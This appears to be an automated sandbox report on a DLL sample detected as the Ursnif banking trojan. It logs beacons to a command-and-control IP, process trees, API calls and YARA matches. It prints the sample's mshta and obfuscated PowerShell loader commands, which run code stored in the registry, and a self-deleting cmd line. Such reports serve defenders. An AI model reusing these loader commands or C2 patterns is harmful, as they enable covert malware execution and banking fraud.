                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 146.70.35.138
                      Source: rundll32.exe, 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
                      Source: rundll32.exe, 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
                      Source: rundll32.exe, 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_049F4CC6 ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,
                      Source: global trafficHTTP traffic detected: GET /phpadmin/DRUYboFifxi6C3/_2BjVEcKiT1b8A_2BvMed/1ckh5D3V8MdKp2S2/SxMBQuJjSXDeW9Y/7fodbbXY21Jrsa2aXJ/S90Gqb_2B/KDYz_2F5NJsyx14KqPKz/ecUQVATr13lzZyN_2B_/2BoLTTXT06dmMNQURoEaga/M1AdtgAQJw1vj/q_2FSYWg/oo4zTjJDuzf2mz8BRfV3I9z/TX7m3RhRWd/LYr8gkK9WgmQ0jja9/kmBHLi0WTs_2/FFd4Km9NmRn/_2FUZ.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /phpadmin/GVoID0TbPRvLYlr7up2X9/gD2XQvRshzT0oIvQ/0mEtVI_2FJuzvKC/fbaZh1y3_2FnOqy8_2/B0Y8u0dqv/V11JJbfZHGLCQ043KVhZ/2j3FiaSLUSAIqnVTtEF/p_2F7mTRIgp_2F43j86HIJ/7JamWIlhMtaxW/Qv_2BsMI/GK_2BjMae66_2B0eWRxZare/pyglkGar6g/LD_2FkUNwRZVbFFyN/qmaS1_2FZd3W/iyocOp4EpCY/lkbOHJ4rs/yFlR4ppeN_2/FAS.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /phpadmin/Vo3V1ij8xfQAzbYEppxuGj/YfKBcB_2BiFsK/C5o_2FK1/LFX_2FAQmA1J0Gg2IGK0zii/Cqu4J51vDj/wlNBNCb18BPgk55aw/3DJofkjbHHw_/2F3O9t6XtUN/FhzyouLiXCH4qy/e6m_2F6Bp87emTDJkwB0B/GJSc0pfzfjLvMKIS/Fcz1B6FomHVea2H/3F6nRjbT0qghS0NNIb/kfO6CmRa0/E8U4GDXz2DXZU_2BDOzp/T84va5G8JnhB3/UMJfQ.src HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 146.70.35.138Connection: Keep-AliveCache-Control: no-cache

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.260779553.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.308220825.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.260884971.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.309153947.0000000004D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.306041676.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261032532.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261191379.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.260987111.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261105592.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261071181.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261177888.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5292, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6612, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.48994a0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.49f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.48994a0.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4e7a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4f26940.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4ef94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4e7a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.307999471.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.418290264.0000000004899000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.307957841.0000000004E7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.420929959.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      E-Banking Fraud

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.260779553.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.308220825.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.260884971.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.309153947.0000000004D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.306041676.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261032532.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261191379.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.260987111.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261105592.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.369967418.000001909FD9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261071181.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.365233310.0000000005D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.261177888.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5292, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6612, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.48994a0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.49f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.48994a0.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4e7a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4f26940.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4ef94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4e7a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.307999471.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.418290264.0000000004899000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.307957841.0000000004E7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.420929959.0000000004BFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_049F3072 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,

                      System Summary

                      barindex
                      Writes registry values via WMI
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: VoevdOQpeU.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 608
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_049F821C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_049F198A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_049F475F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_058184D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05808FA6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_058237F4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05801E50
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0581C3A9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05820B0E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0581488B CreateProcessAsUserW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_049F3A9C NtMapViewOfSection,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_049F4695 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_049F25D7 GetProcAddress,NtCreateSection,memset,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_049F8441 NtQueryVirtualMemory,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05815D9D NtQueryInformationProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0581F5FF memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05815CA1 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_058144A5 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05801C78 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0581312E RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_058212F1 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0581AD9E NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0581B628 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0581264B NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05815188 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_058029B2 NtGetContextThread,RtlNtStatusToDosError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0581C1C2 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_0580A085 memset,NtQueryInformationProcess,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05815830 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05801B92 NtQuerySystemInformation,RtlNtStatusToDosError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_05807A1E memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,
                      Source: VoevdOQpeU.dllBinary or memory string: OriginalFilenamerpcapd.exe0 vs VoevdOQpeU.dll
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: VoevdOQpeU.dllReversingLabs: Detection: 38%
                      Source: VoevdOQpeU.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 608
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 616
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 608
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Xf38='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Xf38).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2392.tmp" "c:\Users\user\AppData\Local\Temp\poet0yxq\CSCB57F583549494C91A9647985948976.TMP"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3B60.tmp" "c:\Users\user\AppData\Local\Temp\bscdh0f0\CSCCEA1AC591E3E41DFA7DCA22F6F20A95.TMP"
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\VoevdOQpeU.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name uqcywglb -value gp; new-alias -name kiubrmsyn -value iex; kiubrmsyn ([System.Text.Encoding]::ASCII.GetString((uqcywglb "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\poet0yxq\poet0yxq.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bscdh0f0\bscdh0f0.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2392.tmp" "c:\Users\user\AppData\Local\Temp\poet0yxq\CSCB57F583549494C91A9647985948976.TMP"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3B60.tmp" "c:\Users\user\AppData\Local\Temp\bscdh0f0\CSCCEA1AC591E3E41DFA7DCA22F6F20A95.TMP"
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\VoevdOQpeU.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220423Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WER2F57.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.evad.winDLL@29/23@0/2
                      Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_049F6DB6 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\VoevdOQpeU.dll",#1
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6644:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5764:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1428
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{18B00793-9774-0A09-E1CC-BBDEA5C01FF2}
                      Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{107D1110-2FAD-C278-3944-D3167DB8B7AA}
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
